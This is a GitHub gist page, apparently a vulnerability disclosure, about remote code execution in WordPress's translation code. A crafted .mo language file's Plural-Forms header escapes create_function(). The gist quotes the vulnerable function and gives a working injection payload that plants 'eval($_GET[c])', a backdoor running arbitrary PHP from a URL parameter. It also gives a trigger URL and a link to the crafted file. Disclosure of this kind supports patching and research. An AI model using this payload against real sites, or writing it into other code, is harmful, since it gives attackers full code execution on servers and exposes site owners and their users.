Instantly share code, notes, and snippets.

anonymous /.md Secret
Created Oct 8, 2016

Embed
What would you like to do?
WordPress RCE via specially crafted .mo language file

WordPress RCE via specially crafted .mo language file

The vulnerability code in wp-includes/pomo/translations.php:

  function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
  }

PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use } close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment